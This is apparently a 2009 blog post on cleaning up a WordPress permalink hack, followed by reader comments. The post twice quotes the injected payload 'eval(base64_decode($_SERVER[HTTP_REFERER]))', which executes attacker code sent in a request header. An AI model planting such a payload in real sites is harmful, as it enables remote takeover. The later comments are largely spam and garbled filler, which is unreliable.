I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929
If you notice something similar or weird with your WordPress blog, you might want to take the following steps:
- Check the “users” tab from the WP admin interface
- Remove any unfamiliar users, esp those marked as “administrator”
- To prevent users from registering, I’d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)
- Check all of WordPress’ PHP scripts, remove global “execute” privileges
Once you’ve secured the perimeter, look at the “Settings” and “permalinks” tab.
If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929”, you’d want to clear that, and replace it with your original permalink structure, or look it up on the WordPress codex.
You can also check out this other blog post for more details.
Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.
UPDATE: Matt Mullenweg from the WordPress development team has posted about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write up about what might be happening.
You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.
Pingback: Hemos sido Hackeados!!!
Pingback: Zeckenangriff auf Crouched | Crouched
We got it, too. Is this a world wide problem? I googled the change script and it seems a few similar problems have popped out recently.
Thanks for this post – we’ve seen it three times today, not sure what versions were running.
Thank you, it helped me tonight !! 🙂
Hi there
Many thanks for this information, I was at my wits end trying to resolve this lol, I think mine occured because of installing the seo plugin pack, but doing what you said on this post worked fine !
Woc
They got me. Thanks for the info on how to clean it up. Wasn’t as cut and dried as you made it sound… had some trouble with my htaccess file. But it’s all good now!
Thanks so much Andrew, my blog was also similarly affected and I’ve followed your instructions to fix the issue. I’d have been completely stumped without this post.
Wonder if they’re targeting online marketers, the rotters?!
Pingback: Wordpress Permalink Hack – Watch Out! » UK Affiliate Marketing Blog - Kirsty's Affiliate Marketing Guide - Affiliate Stuff UK
Andrew – a colleague also affected has just told me that most people affected will also have had a new admin inserted directly into their SQL database that doesn’t show up in WordPress interface.
I found this had been placed into my SQL db, it has obviously been stored for later foul internet deeds to be performed…
Hi Kirsty,
Thanks for that. I’ll drop a note to my server admin.
For those who’re using fantastico/cPanel, it should be an easy fix from the “mySQL database” or “phpMyAdmin” consoles.
Lots more going on beneath the surface! Permalinks and hidden admin users! This blog post worked for me to clean house: http://blog.nachotech.com/?p=125
I also renamed my xmlrpc.php and wp-register.php files as a stop-gap solution. It seems 2.8.4 blogs are safe so far. I am guessing 2.8.5 will be out ASAP to correct this is 2.8.4 doesn’t.
This post is very good for me.. i can get many tips and trick on this blog.. thank’s for u’r information my friend! this is my first time to visiting to your blog..
Pingback: WordPress Attack: How to protect your blog when you don't know MySQL from My Little Pony | Corporate Blogger | Business Blogging, Web 2.0 & Social Media Marketing for SMEs
Thanks for your post! I just had the problem. 🙁
Thanx a lot! Really works!
This helps! Thank you! I was trying to figure out these problems the other day!
I just could not depart your web website before suggesting that I really enjoyed the usual information a person offer on your visitors? Is going to be back continuously to check out new posts.
wyXfmbFltkZ Isabel Marant Boots wgWfheLqdiT Isabel Marant Sneakers wrLqgbFmfgY http://www.isabelmarantbootsneakersz.com/
wtZwblZmusV Hyperfuse 2012 wlMfdtUickH Nike Hyperdunk 2012 wdLyktLtsdX http://hyperdunk2012.weebly.com/
wcXcjxOiklJ Jordans Retro Shoes wjRvobSorbZ New Jordan 2012 Shoes weKbnhRxtpP http://www.cheapjordanshoez.com/
wbThhuDpzfN Jordan 11 wrHoosRelnH Jordan 11 Concord wsJydbWbbcZ http://www.jordan11concordbred.com/
wqJbtqUajdR nike air penny 5 wpFtxnHaqcI air penny 5 wuSgfsRsmpF http://nikeairpenny5.weebly.com/
wfGotlQbvcF nike air penny 5 whBmrjGaqzE penny 5 wkYwzxJeduA http://airpenny5s.com/
wpZbohZfooW isabel marant boots wtDiywHnciX isabel marant sneakers wfEwllNzdpP http://isabelmarantsneakers2012z.weebly.com/
waTsnmObquH Black Foamposites wtHuooKvfsO Foamposites For Sale woMojlLvsyN http://www.cheapfoampositez2013.com/
This helps! Thank you! I was trying to figure out these problems the other day!
Thanks for sharing your thoughts about blogging.
Regards
Pretty nice post. I simply stumbled upon your weblog and wanted to mention that I’ve really loved
surfing around your weblog posts. After all I’ll be subscribing in your feed and I am hoping you write again soon!
Aw, this was an extremely nice post. Taking the time and actual effort to generate a really good article… but what can I say… I
put things off a whole lot and never manage to get nearly anything done.
Hi there would you mind letting me know which web host you’re working with?
I’ve loaded your blog in 3 different internet browsers and I must say this blog loads a lot faster
then most. Can you suggest a good web hosting provider at a honest price?
Thanks a lot, I appreciate it!
I happen to be writing to let you know what a nice experience
my cousin’s girl enjoyed using your blog. She noticed so many details,
which included what it is like to possess a very
effective coaching spirit to get other people with no
trouble have an understanding of a number of extremely tough issues.
You undoubtedly exceeded our expectations. I appreciate you for distributing such practical,
trusted, edifying and in addition easy tips about that topic to Kate.
C’est du bonheur de visiter cce poste
What’s up to every one, for the reason that I am genuinely eager
of reading this blog’s post to be updated daily. It includes nice information.
Can one with no security, no lien and no warranty want to
get a company loan? No, if the customer goes through typical channels.
However when he has none of these, it is a typical circumstance.
There is an escape for the borrower: unsecured company loans!
Right here, you are not required to offer all these lawfully legitimate files.
Rather is it your business need that is taken into consideration for your loan application to be considered.
It goes without saying that a repayment is must. However,
not like other traditional loans. Credit report can take a rear when this merchant
cash loan type of loan is granted.
Examine your house’s curb appeal and make some improvements.
Your homes ought to be attractive enough that house hunters would believe it is
worth purchasing. Do not opt for a sub-par appearance.
Put in the very best accessories and brighten your house.
The point is to make your home stand out. And the best you can do is to
highlight the very best locations of your house.
Both short and long term loans are on the offer. Long term loans are basically for bring out
long-lasting techniques of a company. They are, by nature, buoyed up by not having extremely precise repayment clauses.
Nor are they handicapped by having pay-by-date. Wait till your business sees a significant improvement and then begin paying.
Just do not take all your life. Little companies can take the loans to take care of short-term uses and
pay back whenever there is money enough to pay back.
So if you want a perfect example of exactly what business use viral
marketing, look them up on youtube or just log into your facebook.
Chances are you have actually seen them being
circulated from buddy to pal on Facebook, Twitter and even through
your email.
Good quality advertisements that appear in lots of various genuine estate booklets and a representative that
knows how to get the word out will certainly help speed up the procedure.
It’s likewise useful to inform all of your close friends, family members, and any individual who will listen that you have a great piece of home for sale.
Word of mouth is totally free and a beneficial advertising strategy.
Sending by mail List – Perhaps you wish to share your knowledge in a newsletter.
Start gathering customers and begin sharing! There are lots of excellent company out
there to help you do this. Google Groups and Yahoo
Groups are two popular options internet marketing that are simple to set up and get lots of visitors.
Is your market niche enough? In truth, niche advertising is the only advertising that works wonder in web
marketing. You have to concentrate your market very specifically in order to construct much targeted
potential customers. Much like if you are targeting sport market, which sport are you targeting?
Is it tennis? And even if it is tennis, you must still additionally focus your market,
like female’s tennis and so on.
20. Know Your Consumers: One ought to have an idea about their targeted consumers.
You can conduct marketing research and customer polls for such purposes to establish an item that satisfies the consumer requirements.
Incessantemente lembrando que é preciso conseguir a data retirando para bateria do DVR para usá-la no gerador a senhas.
Je peux vous dire que c’est éternellement
dde la joie de venir sur votre blog
Oferujemy pe?en zakres us?ug fryzjerskich, zarówno damskich, jak i m?skich,
stylizacj? oreaz indywidualny dobór fryzur.
I am writing to let you know what a notable encounter my
princess obtained using your webblog. She noticed lots of
details, most notably what it’s like to possess an incredible teaching
style to have other folks without problems master specific extremely tough subject matter.
You really exceeded her expectations. Thank you for distributing
these warm and friendly, trusted, educational as well as easy thoughts
on the topic to Jane.
Oferujemy Pa?stwu porady prawne z zakresu prawa handlowego, cywilnego, rodzinnego.
Any business related issues is resolved by the customer support tram immediately on a call,
email or online chat. Therefore, there’sa great chance
that you might have downloaded a file which also triggered an adware download.
Hack tthe registry and manually remove invvalid entries.
Your style is unique in comparison to other people I’ve read stuff from.
Thank you for posting when you have the opportunity, Guess I will just bookmark this site.